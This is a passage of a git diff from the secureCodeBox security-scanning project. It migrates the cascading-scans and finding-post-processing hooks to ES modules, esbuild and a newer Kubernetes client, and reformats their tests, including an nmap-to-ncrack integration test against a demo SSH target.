"sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index da4fd89f03..be0ccea304 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -1,6 +1,7 @@ { "name": "@securecodebox/hook-cascading-scans", "version": "1.0.0", + "type": "module", "description": "secureCodeBox Hook to cascade scan in an declarative manner.", "homepage": "https://www.secureCodeBox.io", "repository": { @@ -9,9 +10,8 @@ }, "main": "hook.js", "scripts": { - "build": "npx tsc hook.ts --sourceMap --esModuleInterop", - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" + "lint": "npx tsc hook.ts --noEmit --skipLibCheck", + "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap *.ts" }, "keywords": [ "secureCodeBox", @@ -38,20 +38,20 @@ }, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "ip-address": "^8.1.0", - "lodash": "^4.17.21", - "matcher": "^4.0.0", + "@kubernetes/client-node": "^1.3.0", + "ip-address": "^10.0.1", + "lodash-es": "^4.17.21", + "matcher": "^5.0.0", "mustache": "^4.2.0", - "parse-domain": "^4.1.0" + "parse-domain": "^8.2.2" }, "devDependencies": { "@types/ip-address": "^7.0.0", - "@types/jest": "^29.4.0", "@types/lodash": "^4.14.171", - "@types/node": "^16.0.0", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", - "typescript": "^4.3.5" + "@types/matcher": "^1.1.0", + "@types/mustache": "^4.2.6", + "@types/node": "^22.16.0", + "esbuild": "^0.25.5", + "typescript": "^5.8.3" } } diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index 3e81b3f57d..d8b78b2b38 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -2,21 +2,28 @@ // // SPDX-License-Identifier: Apache-2.0 -import * as k8s from "@kubernetes/client-node"; - +import { isEqual } from "lodash-es"; +import { CustomObjectsApi, KubeConfig } from "@kubernetes/client-node"; +import type { + V1Container, + V1EnvVar, + V1Toleration, + V1Volume, + V1VolumeMount, + V1ObjectMeta, +} from "@kubernetes/client-node"; + +import { getScanChain } from "./hook.js"; +import { ScopeLimiterRequirement } from "./scope-limiter.js"; import { generateSelectorString, LabelSelector, -} from "./kubernetes-label-selector"; -import {isEqual} from "lodash"; -import {getScanChain} from "./hook"; -import {ScopeLimiterRequirement} from "./scope-limiter"; +} from "./kubernetes-label-selector.js"; // configure k8s client -const kc = new k8s.KubeConfig(); -kc.loadFromDefault(); - -const k8sApiCRD = kc.makeApiClient(k8s.CustomObjectsApi); +const kc = new KubeConfig(); +kc.loadFromCluster(); +const k8sApi = kc.makeApiClient(CustomObjectsApi); const namespace = process.env["NAMESPACE"]; @@ -31,7 +38,7 @@ export interface Finding { } export interface CascadingRule { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: CascadingRuleSpec; } @@ -51,7 +58,7 @@ export interface Matches { } export interface Scan { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ScanSpec; status?: ScanStatus; } @@ -60,13 +67,13 @@ export interface ScanSpec { scanType: string; parameters: Array; cascades: LabelSelector & CascadingInheritance; - env?: Array; - volumes?: Array; - volumeMounts?: Array; - initContainers?: Array; + env?: Array; + volumes?: Array; + volumeMounts?: Array; + initContainers?: Array; hookSelector?: LabelSelector; - tolerations?: Array; - affinity?: k8s.V1Toleration; + tolerations?: Array; + affinity?: V1Toleration; resourceMode: "clusterWide" | "namespaceLocal"; } @@ -94,7 +101,7 @@ export interface ScanStatus { } export interface ParseDefinition { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ParseDefinitionSpec; } @@ -102,12 +109,12 @@ export interface ParseDefinitionSpec { scopeLimiterAliases: ScopeLimiterAliases; } -export type ScopeLimiterAliases = {[key: string]: string}; +export type ScopeLimiterAliases = { [key: string]: string }; export function mergeInheritedMap( parentProps, ruleProps, - inherit: boolean = true + inherit: boolean = true, ) { if (!inherit) { parentProps = {}; @@ -124,7 +131,7 @@ export function mergeInheritedMap( export function mergeInheritedArray( parentArray = [], ruleArray = [], - inherit: boolean = false + inherit: boolean = false, ) { if (!inherit) { parentArray = []; @@ -135,21 +142,21 @@ export function mergeInheritedArray( export function mergeInheritedSelector( parentSelector: LabelSelector = {}, ruleSelector: LabelSelector = {}, - inherit: boolean = false + inherit: boolean = false, ): LabelSelector { let labelSelector: LabelSelector = {}; if (parentSelector.matchExpressions || ruleSelector.matchExpressions) { labelSelector.matchExpressions = mergeInheritedArray( parentSelector.matchExpressions, ruleSelector.matchExpressions, - inherit + inherit, ); } if (parentSelector.matchLabels || ruleSelector.matchLabels) { labelSelector.matchLabels = mergeInheritedMap( parentSelector.matchLabels, ruleSelector.matchLabels, - inherit + inherit, ); } return labelSelector; @@ -160,15 +167,14 @@ export async function startSubsequentSecureCodeBoxScan(scan: Scan) { try { // Submitting the Scan to the kubernetes api - const createdScan = await k8sApiCRD.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scan, - "false" - ); - console.log(`-> Created scan ${createdScan.body["metadata"].name}`); + const createdScan = await k8sApi.createNamespacedCustomObject({ + version: "v1", + group: "execution.securecodebox.io", + plural: "scans", + namespace: namespace, + body: scan, + }); + console.log(`-> Created scan ${createdScan.metadata.name}`); } catch (error) { console.error(`Failed to start Scan ${scan.metadata.generateName}`); console.error(error); @@ -185,23 +191,19 @@ export async function getCascadingRulesForScan(scan: Scan) { const labelSelector = generateSelectorString(scan.spec.cascades); console.log( - `Fetching CascadingScans using LabelSelector: "${labelSelector}"` + `Fetching CascadingScans using LabelSelector: "${labelSelector}"`, ); - const response: any = await k8sApiCRD.listNamespacedCustomObject( - "cascading.securecodebox.io", - "v1", - namespace, - "cascadingrules", - undefined, - undefined, - undefined, - undefined, - labelSelector - ); + const { items: cascadingRules } = await k8sApi.listNamespacedCustomObject({ + group: "cascading.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "cascadingrules", + labelSelector: labelSelector, + }); - console.log(`Fetched ${response.body.items.length} CascadingRules`); - return response.body.items; + console.log(`Fetched ${cascadingRules.length} CascadingRules`); + return cascadingRules; } catch (err) { console.error("Failed to get CascadingRules from the kubernetes api"); console.error(err); @@ -211,18 +213,18 @@ export async function getCascadingRulesForScan(scan: Scan) { export async function getParseDefinitionForScan(scan: Scan) { try { - const response: any = await k8sApiCRD.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "parsedefinitions", - scan.status.rawResultType - ); - - return response.body; + const response: ParseDefinition = await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "parsedefinitions", + name: scan.status.rawResultType, + }); + + return response; } catch (err) { console.error( - `Failed to get ParseDefinition ${scan.status.rawResultType} from the kubernetes api` + `Failed to get ParseDefinition ${scan.status.rawResultType} from the kubernetes api`, ); console.error(err); process.exit(1); @@ -233,7 +235,7 @@ export async function getParseDefinitionForScan(scan: Scan) { // (and not its children), this function purges the cascading rule spec from the parent scan when inheriting them. export function purgeCascadedRuleFromScan( scan: Scan, - cascadedRuleUsedForParentScan?: CascadingRule + cascadedRuleUsedForParentScan?: CascadingRule, ): Scan { // If there was no cascading rule applied to the parent scan, then ignore no purging is necessary. if (cascadedRuleUsedForParentScan === undefined) return scan; @@ -245,8 +247,8 @@ export function purgeCascadedRuleFromScan( scan.spec.env = scan.spec.env.filter( (scanEnv) => !cascadedRuleUsedForParentScan.spec.scanSpec.env.some((ruleEnv) => - isEqual(scanEnv, ruleEnv) - ) + isEqual(scanEnv, ruleEnv), + ), ); } @@ -257,8 +259,8 @@ export function purgeCascadedRuleFromScan( scan.spec.volumes = scan.spec.volumes.filter( (scanVolume) => !cascadedRuleUsedForParentScan.spec.scanSpec.volumes.some( - (ruleVolume) => isEqual(scanVolume, ruleVolume) - ) + (ruleVolume) => isEqual(scanVolume, ruleVolume), + ), ); } @@ -269,8 +271,8 @@ export function purgeCascadedRuleFromScan( scan.spec.volumeMounts = scan.spec.volumeMounts.filter( (scanVolumeMount) => !cascadedRuleUsedForParentScan.spec.scanSpec.volumeMounts.some( - (ruleVolumeMount) => isEqual(scanVolumeMount, ruleVolumeMount) - ) + (ruleVolumeMount) => isEqual(scanVolumeMount, ruleVolumeMount), + ), ); } @@ -287,8 +289,8 @@ export function purgeCascadedRuleFromScan( scan.spec.hookSelector.matchExpressions.filter( (scanHookSelector) => !cascadedRuleUsedForParentScan.spec.scanSpec.hookSelector.matchExpressions.some( - (ruleHookSelector) => isEqual(scanHookSelector, ruleHookSelector) - ) + (ruleHookSelector) => isEqual(scanHookSelector, ruleHookSelector), + ), ); } if ( @@ -316,21 +318,21 @@ export async function getCascadedRuleForScan(scan: Scan) { async function getCascadingRule(ruleName) { try { - const response: any = await k8sApiCRD.getNamespacedCustomObject( - "cascading.securecodebox.io", - "v1", - namespace, - "cascadingrules", - ruleName - ); + const response: CascadingRule = await k8sApi.getNamespacedCustomObject({ + group: "cascading.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "cascadingrules", + name: ruleName, + }); console.log( - `Fetched CascadingRule "${ruleName}" that triggered parent scan` + `Fetched CascadingRule "${ruleName}" that triggered parent scan`, ); - return response.body; + return response; } catch (err) { console.error( - `Failed to get CascadingRule "${ruleName}" from the kubernetes api` + `Failed to get CascadingRule "${ruleName}" from the kubernetes api`, ); console.error(err); process.exit(1); diff --git a/hooks/cascading-scans/hook/scope-limiter.test.js b/hooks/cascading-scans/hook/scope-limiter.test.js index 99bc175f5a..1361ba1b69 100644 --- a/hooks/cascading-scans/hook/scope-limiter.test.js +++ b/hooks/cascading-scans/hook/scope-limiter.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {isInScope: isInScopeInternal} = require("./scope-limiter"); +const { isInScope: isInScopeInternal } = require("./scope-limiter"); let scopeLimiter = undefined; let annotations = undefined; @@ -40,7 +40,7 @@ it("Requirement key must start with 'scope.cascading.securecodebox.io/'", () => }, ]; expect(isInScope).toThrowError( - "key 'engagement.scope/domains' is invalid: key does not start with 'scope.cascading.securecodebox.io/'" + "key 'engagement.scope/domains' is invalid: key does not start with 'scope.cascading.securecodebox.io/'", ); }); @@ -60,7 +60,7 @@ it("Requirement key must map to an annotation", () => { }; expect(isInScope).toThrowError( - "using operator 'In': the referenced annotation may not be undefined" + "using operator 'In': the referenced annotation may not be undefined", ); }); @@ -90,7 +90,7 @@ describe("Templating", function () { }, ]; expect(isInScope).toThrowError( - "using operator 'Contains': the referenced annotation may not be undefined" + "using operator 'Contains': the referenced annotation may not be undefined", ); }); @@ -229,7 +229,7 @@ describe("Templating", function () { finding = {}; expect(isInScope).toThrowError( - "Invalid list key 'attributes'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'" + "Invalid list key 'attributes'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'", ); }); }); @@ -540,7 +540,7 @@ describe("Templating", function () { }; expect(isInScope).toThrowError( - "Invalid list key 'attributes.addresses'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'" + "Invalid list key 'attributes.addresses'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'", ); }); @@ -827,7 +827,7 @@ describe("Operator", function () { }, ]; expect(isInScope).toThrowError( - "I am not a domain is an invalid domain name" + "I am not a domain is an invalid domain name", ); }); @@ -843,7 +843,7 @@ describe("Operator", function () { }, ]; expect(isInScope).toThrowError( - "I am not a domain is an invalid domain name" + "I am not a domain is an invalid domain name", ); }); diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index db7bceb52f..cc855cbd2b 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -2,12 +2,13 @@ // // SPDX-License-Identifier: Apache-2.0 -import {Finding, ScopeLimiter, ScopeLimiterAliases} from "./scan-helpers"; -import {V1ObjectMeta} from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; -import * as Mustache from "mustache"; -import {Address4, Address6} from "ip-address"; -import {fromUrl, parseDomain, ParseResultType} from "parse-domain"; -import {flatten, isEqual, takeRight} from "lodash"; +import { type V1ObjectMeta } from "@kubernetes/client-node"; +import Mustache from "mustache/mustache.mjs"; +import { Address4, Address6 } from "ip-address"; +import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; +import { flatten, isEqual, takeRight } from "lodash-es"; + +import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers.js"; export enum ScopeLimiterRequirementOperator { In = "In", @@ -32,7 +33,7 @@ export function isInScope( scopeLimiter: ScopeLimiter, scanAnnotations: V1ObjectMeta["annotations"], finding: Finding, - scopeLimiterAliases: ScopeLimiterAliases + scopeLimiterAliases: ScopeLimiterAliases, ) { if (scopeLimiter === undefined) return true; @@ -44,12 +45,12 @@ export function isInScope( }: ScopeLimiterRequirement): boolean { if (!key.startsWith(`${scopeDomain}`)) { throw new Error( - `key '${key}' is invalid: key does not start with '${scopeDomain}'` + `key '${key}' is invalid: key does not start with '${scopeDomain}'`, ); } // Retrieve operator and validator functions from user operator input - const {operator: operatorFunction, validator: validatorFunction} = + const { operator: operatorFunction, validator: validatorFunction } = operatorFunctions[operator]; if (operatorFunction === undefined) { throw new Error(`Unknown operator '${operator}'`); @@ -83,7 +84,10 @@ export function isInScope( return operatorFunction(props); } - function templateValue(value: string): {values: string[]; rendered: boolean} { + function templateValue(value: string): { + values: string[]; + rendered: boolean; + } { if (value === undefined) return { values: [], @@ -110,13 +114,13 @@ export function isInScope( const path = text.split("."); if (path.length < 3) { throw new Error( - `Invalid list key '${text}'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'` + `Invalid list key '${text}'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'`, ); } const listKey = path.slice(0, path.length - 1).join("."); const objectKey = path.pop(); return render( - `{{#${listKey}}}{{${objectKey}}}${delimiter}{{/${listKey}}}` + `{{#${listKey}}}{{${objectKey}}}${delimiter}{{/${listKey}}}`, ); }; }, @@ -127,7 +131,7 @@ export function isInScope( const path = text.split("."); if (path.length < 2) { throw new Error( - `Invalid list key '${text}'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'` + `Invalid list key '${text}'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'`, ); } return render(`{{#${text}}}{{.}}${delimiter}{{/${text}}}`); @@ -237,8 +241,8 @@ const operatorFunctions: { }; function validate( - {scopeAnnotationValue, findingValues}: Operands, - scopeAnnotationValueUndefinedAllowed + { scopeAnnotationValue, findingValues }: Operands, + scopeAnnotationValueUndefinedAllowed, ) { if ( !scopeAnnotationValueUndefinedAllowed && @@ -254,7 +258,10 @@ function validate( * scopeAnnotationValue: "example.com" * findingValues: ["example.com", "subdomain.example.com"] */ -function operatorIn({scopeAnnotationValue, findingValues}: Operands): boolean { +function operatorIn({ + scopeAnnotationValue, + findingValues, +}: Operands): boolean { return findingValues.includes(scopeAnnotationValue); } @@ -270,7 +277,7 @@ function operatorContains({ }: Operands): boolean { const scopeAnnotationValues = scopeAnnotationValue.split(","); return findingValues.every((findingValue) => - scopeAnnotationValues.includes(findingValue) + scopeAnnotationValues.includes(findingValue), ); } @@ -341,7 +348,7 @@ function operatorSubdomainOf({ // Check if last part of domain is equal return isEqual( scopeAnnotationDomain.labels, - takeRight(findingDomain.labels, scopeAnnotationDomain.labels.length) + takeRight(findingDomain.labels, scopeAnnotationDomain.labels.length), ); } throw new Error(`${findingValue} is an invalid domain name`); diff --git a/hooks/cascading-scans/hook/tsconfig.json b/hooks/cascading-scans/hook/tsconfig.json new file mode 100644 index 0000000000..3ac06d1ff5 --- /dev/null +++ b/hooks/cascading-scans/hook/tsconfig.json @@ -0,0 +1,16 @@ +{ + "compilerOptions": { + "target": "ES2022", + "module": "nodenext", + "outDir": "dist", + "rootDir": ".", + "esModuleInterop": false, + "forceConsistentCasingInFileNames": true, + "skipLibCheck": true, + "allowJs": true, + "noEmitOnError": false, + "strict": false + }, + "include": ["**/*.ts"], + "exclude": ["node_modules", "dist"] +} diff --git a/hooks/generic-webhook/hook/package-lock.json.license b/hooks/cascading-scans/hook/tsconfig.json.license similarity index 100% rename from hooks/generic-webhook/hook/package-lock.json.license rename to hooks/cascading-scans/hook/tsconfig.json.license diff --git a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js b/hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js similarity index 67% rename from hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js rename to hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js index a7280e2a55..44ead1eadc 100644 --- a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-ncrack.test.js +++ b/hooks/cascading-scans/integration-tests/cascade-nmap-ncrack.test.js @@ -2,18 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const {cascadingScan} = require("../../../../tests/integration/helpers"); -var {jest} = require("@jest/globals"); - -jest.retryTimes(3); +import { cascadingScan } from "../../../tests/integration/helpers"; test( "Cascading Scan nmap -> ncrack on dummy-ssh", async () => { - const {categories, severities, count} = await cascadingScan( + const { categories, severities, count } = await cascadingScan( "nmap-dummy-ssh", "nmap", - ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], + ["-Pn", "-p22", "-sV", "dummy-ssh.demo-targets.svc"], { nameCascade: "ncrack-ssh", matchLabels: { @@ -21,7 +18,7 @@ test( "securecodebox.io/intensive": "high", }, }, - 120 + 120, ); expect(count).toBe(1); @@ -32,5 +29,5 @@ test( high: 1, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/hooks/cascading-scans/hook/integration-tests/cascade-nmap-sslyze.test.js.disabled b/hooks/cascading-scans/integration-tests/cascade-nmap-sslyze.test.js.disabled similarity index 100% rename from hooks/cascading-scans/hook/integration-tests/cascade-nmap-sslyze.test.js.disabled rename to hooks/cascading-scans/integration-tests/cascade-nmap-sslyze.test.js.disabled diff --git a/hooks/finding-post-processing/Makefile b/hooks/finding-post-processing/Makefile deleted file mode 100644 index f8991b79cd..0000000000 --- a/hooks/finding-post-processing/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = finding-post-processing - -include ../../hooks.mk - -deploy-test-deps: deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install finding-post-processing . \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="hook.image.pullPolicy=IfNotPresent" \ - --set="rules[0].matches.anyOf[0].category=Host" \ - --set="rules[0].override.severity=high" diff --git a/hooks/finding-post-processing/Taskfile.yaml b/hooks/finding-post-processing/Taskfile.yaml new file mode 100644 index 0000000000..dbd1d3674e --- /dev/null +++ b/hooks/finding-post-processing/Taskfile.yaml @@ -0,0 +1,25 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: finding-post-processing + additionalHelmInstallArgsForHook: | + --set="rules[0].matches.anyOf[0].category=Host" \ + --set="rules[0].override.severity=high" \ + test-scan: + taskfile: ../../scanners/test-scan/Taskfile.yaml + +tasks: + predeploy: + cmds: + - task: test-scan:build + - task: test-scan:deploy \ No newline at end of file diff --git a/hooks/finding-post-processing/hook/Dockerfile b/hooks/finding-post-processing/hook/Dockerfile index 2f59d82b14..dc64c7bf24 100644 --- a/hooks/finding-post-processing/hook/Dockerfile +++ b/hooks/finding-post-processing/hook/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/finding-post-processing/hook/hook.js b/hooks/finding-post-processing/hook/hook.js index 6522916854..806c2c2a26 100644 --- a/hooks/finding-post-processing/hook/hook.js +++ b/hooks/finding-post-processing/hook/hook.js @@ -2,8 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const { isMatch, merge } = require("lodash"); -async function handle({ +import { isMatch, merge } from "lodash-es"; + +export async function handle({ getFindings, updateFindings, rules = JSON.parse(process.env["RULES"]), @@ -14,7 +15,7 @@ async function handle({ await updateFindings(res.findings); } } -module.exports.handle = handle; + /** * Goes through the Findings and the Finding Post Processing Rules * and applies the changes to the findings defined in the rules if matching @@ -25,7 +26,7 @@ function applyRules(rules, findings) { let newFinding = finding; for (const rule of rules) { const isRuleMatching = rule.matches.anyOf.some((condition) => - isMatch(finding, condition) + isMatch(finding, condition), ); if (isRuleMatching) { hasChanged = true; diff --git a/hooks/finding-post-processing/hook/hook.test.js b/hooks/finding-post-processing/hook/hook.test.js index 951287fae1..fbfac1ed32 100644 --- a/hooks/finding-post-processing/hook/hook.test.js +++ b/hooks/finding-post-processing/hook/hook.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook") +import { handle } from "./hook"; test("Should Add High Severity and Description", async () => { const findings = [ @@ -11,28 +11,30 @@ test("Should Add High Severity and Description", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -50,11 +52,11 @@ test("Should Add High Severity and Description", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); }); @@ -65,35 +67,37 @@ test("Should Check Multiple 'anyOf'", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 22, - state: "open" - } - }, - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 22, + state: "open", + }, + }, + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -111,11 +115,11 @@ test("Should Check Multiple 'anyOf'", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); }); @@ -126,35 +130,37 @@ test("Should Ignore Rule Without Matching Conditions", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 22, - state: "open" - } - }, - { - category: "Open Port", - attributes: 